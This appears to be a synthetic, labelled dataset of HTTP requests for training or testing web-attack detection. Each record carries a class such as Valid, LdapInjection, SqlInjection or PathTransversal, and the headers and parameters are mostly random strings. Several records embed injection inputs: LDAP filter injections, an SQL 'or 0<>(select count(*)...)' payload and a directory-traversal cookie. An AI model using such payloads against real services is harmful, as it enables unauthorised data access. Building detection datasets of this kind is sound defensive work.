Transfer-Encoding: agov
Upgrade: odo/1.8
Warning: 395 142.107.115.72:81 "auagelgcsknaoh" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 648318819511788387
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13476
Start - Id: 38951
class: LdapInjection
GET /oxs/l09hjPT/aeipaetflt1roEjenoe/eyaicei9086eotto7/aF/ttAr3umfisia/kD5KPNrRhu1d./cEZ8N/-JN8ku/0hobCf2f/aYfe5Moetatgee/eqsnheachoeupsjoy5d.html?g8=%29+%28+%7C++%28++++cn%3D*o++++%27brien*%29%28mail%3D*o++%27brien*+++%29++++&d3itio7=betweene%25updateteocmitmpznprocessing-instruction HTTP/1.0
Host: 198.157.63.108:80
Connection: inins
Accept: */*
Accept-Charset: x-mac-chinesesimp, koi8
Accept-Encoding: *;q=0.2
Accept-Language: tnoh-raatugsx;q=0.4, cmealCTe-na, H-8iEirse, s1t-Al;q=0.7, shtdeiu6-weA
Cache-Control: max-age=34461
Client-ip: 69.146.201.136
Cookie: bceesenryt4s=9142172;pssEaiaod=36481;ishhkrowcS=l@jQ8q;dqbnesS=iTT7Wnj;g8bl9xgnetticct=58327622
Cookie2: $Version="66"
Date: Tue, 05 Oct 04 16:59:29 CET
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 7onuerm
From: merdf@ssdhtag.cz
If-Modified-Since: Fri, 02 Oct 09 19:22:01 GMT
If-Unmodified-Since: Fri, 26 Jan 07 04:04:34 GMT
If-Match: "_KGCGIjngOU45m@wrC3"
If-None-Match: *
If-Range: *
Max-Forwards: 0060
MIME-Version: 6.2
Pragma: islSc=gedZtrt
Proxy-Authorization: NTLM dkplbGtuZjJBYUpvcFNzeVNJYXVuNk5VbmVpZm5ya3QxZQ==
Authorization: Basic ZTFhbHI6c2FoMmlzdA==
Range: 678-706492,70758-,6439-
Referer: /geg50o.exe
TE: chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 5.7; Dh-Tf; rv:2.7.4) Gecko/94827343
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/1.6 www.lNind.shtml, HTTP/3.7 178.46.45.83
Transfer-Encoding: lis2bs; eatroaat=otwrg
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 175 55.57.212.248 "yxhnh1o3It" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38951
Start - Id: 30430
class: Valid
GET /lYrdnmIYVVkkhuzZTpV/cGJoZ2AmhtpassCtelnet5p/Ek7E66/u5Wdumsa8A1srtrWFvO.js?n53qnau=nvVCjGJxX&ri=services8nbesne0ace3do&Zmail1H=52191477&rsmvlsett=inlhttpsOopnisah&evea=ctTeoiyu&nioArolsrdeol=h7iaejsloeeehehrnd&fgtsgoomede=91&alsrytvroe=5en&aa2zfynanoo=bn5n&EEs4deg=bmhwKbRMB&eircn=eGbe5UD99yzU&LIdunion1D=e%29%27&nnhhdb=eEghaaaaaepacfmprj&aiael=47&adAilreadh=rrfxgeNiOito HTTP/1.1
Host: www.hxoraT.uk
Connection: eqnmil
Accept: */*
Accept-Charset: windows-1252;q=0.7, koi8-r;q=0.3, iso-8859-1;q=0.9, cp-932, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 222.100.187.30
Cookie: ri=eoe;et=tohebody;sn1vOw=thttp;ml6pebnye=mFa;svEanaf=mizpXGL84
Cookie2: $Version="2"
Date: Sat, 25 Jun 05 21:01:04 GMT
ETag: "qxgtxQ_CE8Y_iDs60"
Expect: 100-continue
From: nicahwnb@ergcencs.st
If-Modified-Since: Thu, 17 Jul 08 14:12:49 UTC
If-Unmodified-Since: Thu, 16 Jul 09 22:33:38 UTC
If-Match: *
If-None-Match: "lflxPY-Ex7Ya4Hwg3"
If-Range: Fri, 16 Dec 05 21:34:49 CET
Max-Forwards: 21
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: nytrr hppmt=esdb
Authorization: Basic b2FwOTp0d2Vl
Referer: /ceWm/taShFh/aaal/rhaA/uIu48e.cgi
TE: gzip
Trailer: Pragma
User-Agent: rznnoienhfroartRn
UA-CPU: PowerPC
UA-Disp: 875,388,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x400
Via: 2.6 www.ipmear.html, eeenr/0.3 51.130.43.4
Transfer-Encoding: deflate
Upgrade: ateie/8.9, w2the/1.3, eivOe/3.4
Warning: 485 87.113.145.16 "tapaxhedta" 
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 17997505261977757757
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30430
Start - Id: 37976
class: LdapInjection
GET /cBdDbkYFR2iOyxMi_F_6.js?6ia=mncE06E.en&x1xbetween=%29+++%28+%7C++++%28displayName%3Dhad*%29++++%28name++++%3D++++had*%29%28++mail%3Dhad*++%29&fEwFBdtk2WWt=e7har%3Cde HTTP/1.0
Host: www.65sral.org
Connection: keep-alive
Accept: video/*
Accept-Charset: x-mac-cyrillic, x-mac-turkish;q=0.7, iso-2022-kr;q=0.2
Accept-Encoding: compress;q=0.4, gzip, identity;q=0.1, deflate;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 79.7.80.246
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="64"
Date: Sat, 21 Feb 04 22:01:19 GMT
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Mon, 29 Sep 08 09:10:49 CET
If-Match: *
If-None-Match: *
If-Range: "6Ji04cuZ6Qc6RF.b"
Max-Forwards: 59
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Irsnpo eeena=f7dr
Range: 4893-,-7197
Referer: http://www.meghm.ch/eq6btz9/itrkkli/LtirgE.bin
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: hrMNAkUxQ9 http://www.eaut.net
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8848x2681
Via: FTP/7.3 187.106.37.213, 3.6 www.eolDs.shtml:1
Transfer-Encoding: tNlu
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37976
Start - Id: 25958
class: Valid
GET /rC_fZsmrfiEXPp_4-D/piQxMrKeRelZKh@wtrI.aspx? HTTP/1.1
Host: www.l1sSx.be:80
Connection: close
Accept: */*
Accept-Charset: koi8, iso-8859-5;q=0.7, cp-932;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: l-a7sr, hhhual-octx;q=0.0, rUosee-cttoOaNr;q=0.4
Cache-Control: no-store
Client-ip: 24.235.222.46
Cookie: aamoaf=508347;lsk1Qkjkvar=514;COpservicesL-IF=99;es2paez5ord=psznzaStmnTs5h6
Cookie2: $Version="5"
Date: Thu, 12 Jul 07 04:11:02 GMT
ETag: W/"wo3tumGbCtZlZ-PW4n"
Expect: iuteg=eH0uteda
From: tztba@mlyibacoy2.cz
If-Modified-Since: Sat, 12 Mar 05 14:54:02 CET
If-Unmodified-Since: Mon, 04 May 09 21:36:29 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 001
MIME-Version: 1.4
Pragma: ooaqroxa=r6iae
Proxy-Authorization: dq3Bsa A2qrtl=9wki
Authorization: rtsr 0dSh=iih9
Range: 041-
Referer: http://tcu7do.ch/rtnam.txt
TE: gzip,trailers
Trailer: Host
User-Agent: 2abtp (pGwpQPCO; fm03om43Dk; b4D@VU; n2wcWTk; jEvNDZGP4)
UA-CPU: MIPS
UA-Disp: 3281,342,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5187x1770
Via: HTTP/5.7 96.189.130.72, 5.8 27.177.209.35
Transfer-Encoding: gzip
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25958
Start - Id: 17417
class: Valid
GET /nsssi8osex9schdc/niuo8bhqsstNnera5/5ahsr5Anssa/t_nBluddHHwC/e7llet919eriitl/b4/n_Wr4lvYjKX3L@aCe/dYbbaz4xQw_6lW/oZK-_jbguNupG0.9/hKKdWe0TbCWHqPa/1agsEueineen.aspx?BjobzrA=cnt%3Fw&tEre=mUI HTTP/1.1
Host: 119.212.39.161
Connection: nnttcusn
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 80.246.163.235
Cookie: wp-5FTncz_6d=0860;setUhr2yb=3126651828;hierfwad7ggIiet=u9QTyrA4;oavi7anahpxf=aht;Ettteeau;heinnHD2heir=925757
Cookie2: $Version="106"
Date: Fri, 06 Jun 08 03:18:49 UTC
ETag: W/"-SFr4.3pULWs9tuWYV"
Expect: ot2d
From: ttdntmte@un8ztuz.it
If-Modified-Since: Sat, 05 Dec 09 15:47:37 GMT
If-Unmodified-Since: Sat, 28 Feb 04 07:07:04 GMT
If-Match: "5VyNE.al8TmWDdLI"
If-None-Match: *
If-Range: Fri, 03 Jun 05 03:06:38 UTC
Max-Forwards: 86
MIME-Version: 7.2
Pragma: lM=i
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: hotdEa strxEfo6=sbjttcs
Range: -29
Referer: http://www.7ttemi.it/h6S8h/alonsn/acure.js
TE: trailers
Trailer: If-Match
User-Agent: neaessFrt7asamly
UA-CPU: 68000
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 429x433
Via: 8.0 63.77.52.2:98255, 1.5 www.uanr.jpg:66, HTTP/2.4 www.f2do.jpg
Transfer-Encoding: identity
Upgrade: IoLudo/1.8, eemrri/8.1, aol/1.5
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 145.13.88.62
X-Serial-Number: 8161567353298510
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17417
Start - Id: 42543
class: SqlInjection
GET /qtsrgsrsnartNfhsl3F/upitwiouyegdr/mR5htng/Aavmwhw2/t-0/fJq7dZxFHySNE9/t_BX86Mzh3yfjmvF4/ra3gsg9aihva2hp/rYsuPWg6-iOLAW/hvz.htm?ohhsRa=or+++++0%3C%3E%28select+++count%28*%29++from++meaRnas%29 HTTP/1.1
Host: www.hahlSeaed.uk:80
Connection: bagrrub
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 144.73.242.147
Cookie: bwQssyerhhh=2866
Cookie2: $Version="1"
Date: Sun, 23 Jul 06 24:04:07 CET
ETag: "kPAxt3XJmAHvS2nITL"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Sun, 13 Sep 09 09:57:18 UTC
If-Unmodified-Since: Wed, 05 Jan 05 20:27:53 CET
If-Match: "OdKa-wpU2-1m6YB"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 84
MIME-Version: 3.7
Pragma: vncfeta=jgrxinin
Proxy-Authorization: NTLM ZW9hbnRtYnlsRXN0c3BBYXR5ZzhTczhhM29Fb3NvcGQ=
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 79786-446
Referer: /meuIt.asp
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/1.0 (Windows; U; Win98 8.7; eu-im; rv:9.7.0) Gecko/96437387
UA-CPU: x86
UA-Disp: 353,2829,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: 7.7 www.a0b0ne8.tiff, FTP/2.9 165.79.98.160, 5.0 27.122.232.178
Transfer-Encoding: compress
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 563 www.aePi5.gif "edicbUoeitewfnmtlui" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 42543
Start - Id: 12615
class: Valid
GET /wc8st1wjilpt7x/ernhsTgmmnpy/aQp1EYpw/sz5PKxW87i9yBQRzSD/p9s/c2_XS/yE0vR.dll?e5eyNdreA6=094&eiehreatft9a=ewh&4dntaaSof=oob%3Faobjectsifm&coViTpeiafamhk=ukf-TIGS1Ruh&4HkoentOi=tUSEdk5Klbk&oyLampey4=458347&z-XKeWphpE=+eaccess_logEs&x0gda@@0htpass=112856596&nrmfsraneo=m%28inputeatfT+updateotelnetu%29 HTTP/1.0
Host: 208.89.190.241:3
Connection: close
Accept: application/*, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, identity, compress;q=0.5
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 41.25.57.144
Cookie: FKjidzhavingwGbQt=442;zinuL8O=52372;5ridhq=no>tsyw ;5vshunars82b=9215687414;seoteQstoet=oohde=Aautoexec<ytnt7];eo2icnu=gbetweenistyleeuon
Cookie2: $Version="39"
Date: Sat, 07 Nov 09 18:14:16 GMT
ETag: "YuBwbrDKEKFLX6gCmLsW"
Expect: 100-continue
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Sun, 15 Jun 08 24:09:29 CET
If-Unmodified-Since: Mon, 12 Jan 04 05:15:19 CET
If-Match: *
If-None-Match: *
If-Range: "b8flSwK_gCBvB.4Hpbg"
Max-Forwards: 05
MIME-Version: 1.8
Pragma: ss=r
Proxy-Authorization: Basic aHRzdGg6YWxmaTRz
Authorization: Digest nonce
Range: 6-190
Referer: http://www.matWaktt.biz/hian3u/Thnny.js
TE: trailers,gzip;q=0.4
Trailer: If-Match
User-Agent: xaOieant8w/3.0.6
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 280x609
Via: 4.6 195.113.108.218, HTTP/3.1 www.ihwdw5.jpeg, 9.8 184.47.209.178
Transfer-Encoding: compress
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 037 www.u6ketz3h.png "sEoccn4NiA" "Sat, 22 Dec 07 23:32:36 GMT"
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 5299334202326422361
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12615
Start - Id: 28080
class: Valid
GET /qcGCSEevalirUVR/cdR/ut/j2Yve6lW97i5Frz_W/mpositionPvlODRaccess_logfzH/3RconnectPZrm/Qbetween4L-V9S7/nhC2./hENKqEbOV3OsfIKz8m.gif?erlreemovhah=ztigilf5&bieahtobe=bus&se7e=22&ithemf4s=%3Cc%7Eta9+tl++liht-rImeta&fmnci5b=r9+yr1itaoptP&rxt0donde9nr=5896721&tec6lsate6=eiwh&laliZee=+H&lgtbjlre1aabln=r.gR2atezl84&ena=%3Cy&vSuyltjsyr=7&O6b@MBT=9214282&okce=tsG-&jaiHra=5695684 HTTP/1.0
Host: 196.201.201.237:7
Connection: close
Accept: application/zip;q=0.9
Accept-Charset: gb2312, iso-8859-6;q=0.9, windows-1254;q=0.9, utf-7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.188.210.232
Cookie: ccaOe=s;sn7ae=y/;q6tn=tA3;ipsieMdg9ie=311238;5rvtnocpt=Tnbxp_;eHhyo=argshetpassthrue2erinclude2
Cookie2: $Version="2"
Date: Wed, 22 Feb 06 17:04:03 CET
ETag: W/"15mLDMnewx22uKeQK"
Expect: 100-continue
From: sEIqSy@ietteeidnk.ch
If-Modified-Since: Thu, 10 Dec 09 09:34:59 CET
If-Unmodified-Since: Sat, 18 Feb 06 05:37:22 UTC
If-Match: *
If-None-Match: "NQ7mOTQVYXUraCeA_6"
If-Range: "rm6fujgYs1Y2tIc"
Max-Forwards: 2214
MIME-Version: 0.9
Pragma: nNejtee4='aa4i'
Proxy-Authorization: cvue udao=aeeC
Authorization: Digest qop=eOdai
Range: -570
Referer: http://9QgdHrt.be/xgedexa/ywMhxl/7ivi3/cnen/cWtrb.tiff
TE: chunked;q=0.0,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.7 (X11; U; Linux i586 6.8; sr-ti; rv:9.6.6) Gecko/50772119
UA-CPU: MIPS
UA-Disp: 317,7772,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5401x1168
Via: FTP/1.5 www.Eslendi.gif, HTTP/0.0 247.45.42.7
Transfer-Encoding: compress
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 099 112.213.175.175 "0t3erfhqo" 
X-Forwarded-For: 97.114.38.28
X-Serial-Number: 981815102258
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28080
Start - Id: 44658
class: PathTransversal
GET /ahsellAf1gAn/f5cRKtJ_R4R/romgnDeiaRawe/1F8OX9Vou8Q8Hj/ccdt/o9Y/nTWEeWX5-J@qnCXiWkm/jksagneTeUnsH/ropBM.KvUl.jpg?ih=q2sey60mli&H.E29qhtaccesjYselect=mtrmfixpn&uotiebl1sepreda=021109551&gobra6kTuat0o=gsnnttnni&lyteeo=hd4mlci&uonatulr=einsertrh2rlc%3Aupdatenode&1oen8ter5f=mHvNZCJq&irx4=n&ac=eCk&3cl0nsemtmqel=eehacsn%25r%25c%7E&ym0st6usy8mteaf=snfagee&eenrtlrne=c%28oea HTTP/1.1
Host: 114.215.115.87
Connection: close
Accept: text/plain;q=0.5
Accept-Charset: iso-8859-7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 16.130.45.174
Cookie: sss=68vgur;6uAcQfFyP=./.././../
Cookie2: $Version="1"
Date: Mon, 10 Sep 07 10:50:19 GMT
ETag: W/"-Q1RWC28tlWlA5W2ks"
Expect: 100-continue
From: fIfg@eoiOetgSo.fr
If-Modified-Since: Sat, 19 May 07 01:36:25 CET
If-Unmodified-Since: Sat, 09 Dec 06 11:09:07 CET
If-Match: *
If-None-Match: "rq31P3rY4BBAkGD0wJP"
If-Range: Wed, 30 May 07 04:38:40 UTC
Max-Forwards: 4
Pragma: t2tu='abg'
Proxy-Authorization: eaowfh leeewnas=9Iy2e
Authorization: Digest realm
Range: 73929-1,-1308,686-
Referer: http://e4tNibo.it/rhreEntE/hyea/puleoatc.txt
TE: deflate;q=0.3,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/1.8 (compatible; Konqueror/6.5; Linux i386; eiam; dri9vn6knu; eercNtta)
UA-CPU: MIPS
UA-Disp: 508,1015,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8872x5937
Via: 6.0 www.nC8a.gif, 9.8 19.147.75.108, HTTP/2.0 215.212.80.183
Transfer-Encoding: compress
Upgrade: ervl/3.1, rWat5n/5.8
Warning: 611 www.mA5n.jpeg "Ebst3d" 
X-Serial-Number: 0781889348466
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44658
Start - Id: 10610
class: Valid
GET /ei5/opfXU5v6PrMFQW81-/aOfDoBb17PXuT0uX/7fFh.htm?7I2q=d.XmFWVX&snerrkMeyoso6=tNclr4xt+esie&rnhd1feAimh=i8OEEHbagfi&iam=7516767042&Heojnoeormzn8=8087&nph-NSlsfxZP=oaX2Nr8&1d=ame7itiFeGr&e1wa=%402t%3Cpk&lm=65080&RssRSc8sihhe=EAbabEaynQ&l5Btscigy=ie0lsa&rqlt=09 HTTP/1.0
Host: 20.49.64.26:80
Connection: Snece
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic, iso-8859-6, iso-2022-jp
Accept-Encoding: 
Accept-Language: otwasidw-ooyEo5t;q=0.2, ecalwlhE-isxrmj;q=0.6
Cache-Control: max-stale
Client-ip: 255.234.163.107
Cookie: Soin=idahitworadnselpby;tle2iei=otc(buylvbscripta zre8AHuX;ta=<;ianUt=t;dto;b1YivE6=804950;tr3oflon0=dpsk
Cookie2: $Version="1"
Date: Mon, 25 Jan 10 20:39:49 UTC
ETag: "iaG3z2qLb8jcLG4l"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Sun, 15 Oct 06 06:26:47 CET
If-Unmodified-Since: Fri, 08 May 09 19:49:49 GMT
If-Match: *
If-None-Match: *
If-Range: "7yOo7yKmV2xwkyF-"
Max-Forwards: 9426
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM YUdyVGlhaDVsYmVoMGQ4Z09oMWVhaDdlMXdhZWl5dDNsZXo5OHlz
Authorization: Digest uri=http://oonew5t.gov/eoaetp/usmenm3e/ffaojcg3/tr2n/nirnhae9.jpg
Range: 757-,8584-
Referer: /sned/teqPn/rhcorjh/nzRpcr/yeoehcfh.php
TE: trailers,gzip;q=0.8,trailers
Trailer: If-Unmodified-Since
User-Agent: n8ysslF1e (g5Ucu_U@vo)
UA-CPU: Sparc
UA-Disp: 4542,2926,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9748x5631
Via: FTP/7.0 www.f1awtIhg.shtml, 2.4 www.nnt2e7Rd.htm:62, 7.5 16.9.169.179
Transfer-Encoding: compress
Upgrade: telnx/9.9, iusnr/3.5
Warning: 595 239.203.101.239 "rlhjs5iafegTthd" "Tue, 05 Feb 08 07:12:57 UTC"
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 10610
Start - Id: 34054
class: Valid
POST /cpTKtIx0kC/rhc2ta2x2naecetageaw/f5jIsUhX1-/uneue4e/7tqss2s/t_2xk192M6.asmx? HTTP/1.1
Content-Length: 284
Content-Language: n,1peTiad
Content-Encoding: compress
Content-Location: /sbaue/Sjoo.png
Content-MD5: ZGFtZXNkZWNpaWh0bm52QQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Sep 07 13:19:10 GMT
Last-Modified: Sun, 30 Apr 06 14:01:26 GMT
Host: 155.218.165.14
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-hebrew;q=0.7, iso-8859-2;q=0.2, x-mac-roman
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-stale=11442
Client-ip: 183.39.50.79
Cookie: atfsnusrtriii=579;0absselect@@e.OuM=459;lvokgiseobcys=yreheftlTisfmtl;insert2A.YhRy2=asiccTTyr;aRwy5etc4=62025;dfri=010
Cookie2: $Version="3"
Date: Fri, 06 Nov 09 18:32:05 CET
ETag: "S9OJCWsXznZpHrXG"
Expect: 100-continue
From: a66ero@negstqete.net
If-Modified-Since: Fri, 26 Nov 04 13:44:51 CET
If-Unmodified-Since: Thu, 30 Dec 04 03:57:59 GMT
If-Match: "AbLgHVspgOJ-ztZVc"
If-None-Match: "tFJxzeFTpnBWYlt"
If-Range: *
Max-Forwards: 25
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM c3B4YW5vZGFtZW5IaXNxMjFkbDJhZVRhZHhkaXBmSG8=
Range: 821815-50,1-
Referer: http://www.0nLbhr.fr/tUEE/hmtar/OeueO.cgi
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/4.0 (compatible; Konqueror/1.1; WinNT; iDseinift)
UA-CPU: 68000
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 682x2942
Via: 3.1 59.32.116.51:7
Transfer-Encoding: compress
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 839 136.145.234.240:03 "8eru4Saovlliuyd" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 14296843524
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9oEojfTtni5rhnu=eHt6s&19RnrKo=545&iefoAO=osm&wd9x7NF2lib_IO=lPMnMtJWpM&Ql4sA3P=)h&grikf&Oitubr8iafit=deso&daeEdwOimqnlh=dhEwchdh6E6&zoae=953&eabilSytlip0= 0gkrjsdduiq7c&oei1shprlte=867&twttdooeaabtnm=545201588&Ldarosekdtend=6nss&ictOenaneien=096453&npt9n=libbt  tde&ecehu=20290167

End - Id: 34054
Start - Id: 268
class: Valid
GET /0rmTOSo66C-fu/ewy/nanro6MsNlob/lUhw.png?SMwoGrsyaa=ascsq9relEr3pnsie&eeftel=806365&Aiphntme=r%3Cuinnetcat%5Bv0Xcr4e%28ue2n%3D&ijaeths7ijjup=8414&ueferoSs=edboot.ini2etupdateehrTnl9ecglogIn&@wmCunionKaLlHEv=2nbc6exTtnnTftah&trest=933 HTTP/1.1
Host: 33.186.175.134
Connection: close
Accept: text/xml;q=0.2
Accept-Charset: big5, x-mac-arabic, iso-10646-ucs-2;q=0.0
Accept-Encoding: deflate, gzip, deflate;q=0.5
Accept-Language: Stvememr-ftkbEl2, odta-rwatv;q=0.4, Bbns-g
Cache-Control: no-cache
Client-ip: 101.38.207.176
Cookie: eestP=ei;ntg6lerL9hlw=autoexec3nulle;ihoi=pd6e;yc7=iywe98Iuwc93
Cookie2: $Version="59"
Date: Tue, 01 Mar 05 13:45:34 CET
ETag: W/"6VFAg2ULcs_EddMM"
Expect: 100-continue
From: 6bLaew@vziehEtalu.st
If-Modified-Since: Sun, 12 Sep 04 24:43:41 GMT
If-Unmodified-Since: Mon, 15 Mar 10 18:11:53 UTC
If-Match: "jZ4Cs8BKUJWLi8fyAC"
If-None-Match: "-gOJQAtKvhODRHjVYg"
If-Range: Sat, 26 Sep 09 24:20:50 UTC
Max-Forwards: 9
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM aXRzcHdpdHVqVnRpMG9hZTNtcmRpZXR1RXNoc2hjbHNhc3F0ZXNCMWFzcmk=
Authorization: Digest cnonce="dsosoe8o"
Range: 45-32,65908-442586,1566-181
Referer: /sfOe.mdb
TE: chunked;q=0.1
Trailer: Expect
User-Agent: dqos/7.2.9.4.7
UA-CPU: Sparc
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: 7.1 www.hiUezsi.shtml, HTTP/4.8 126.109.98.57, 8.8 25.169.76.33
Transfer-Encoding: gzip
Upgrade: ire50s/8.5, lsas/9.0, cuedrY/9.7, o119/9.2
Warning: 583 117.40.109.55 "p3wiZwmotaawnneweih" "Tue, 23 May 06 21:35:57 GMT"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 268
Start - Id: 2182
class: Valid
GET /sVruBMkph8JkiM836/8nentmnttc/2VpsM949/0gmra/en/mwasscwto8/eHE7hc4W3k1k8JJF_D9.asp?iwMmQMafhttpsUoa=3&f8am7ttorigm=+le%26e&1DjW=oO07Y&rnN=829991 HTTP/1.0
Host: 223.42.84.199
Connection: keep-alive
Accept: image/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wt-8ecckn;q=0.5, ds0eenb-o
Cache-Control: no-cache
Client-ip: 252.18.215.205
Cookie: eexwdrtn0ceiru=p;__lAA=wb6
Cookie2: $Version="8"
Date: Sat, 15 May 04 04:25:13 UTC
ETag: "7dKcolqFrPttQt23Vf"
Expect: 100-continue
From: 4yA0c@he42.com
If-Modified-Since: Wed, 03 Nov 04 15:26:27 UTC
If-Unmodified-Since: Sat, 13 Nov 04 18:31:04 GMT
If-Match: *
If-None-Match: "k5FeoUb29uXP3YgX24"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: l4HAdi n0Rhdwc=afrs
Range: 41638-,811-3,-52756
Referer: http://www.eetvshhl.it/fnsa/akreutah/eyeai/ot7m/Toredbhi.exe
TE: trailers
Trailer: Expect
User-Agent: Mozilla/1.2 (compatible; Konqueror/1.2; Mac OS X; 6zomadcmX; dotdxk)
UA-CPU: MIPS
UA-Disp: 8951,7788,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 270x992
Via: 1.7 www.tigjme.jpeg:149
Transfer-Encoding: compress
Upgrade: sna/4.3
Warning: 821 104.1.134.166 "maqrtuteli" "Fri, 07 Jan 05 07:27:00 CET"
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 26606464842114964
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2182
Start - Id: 25670
class: Valid
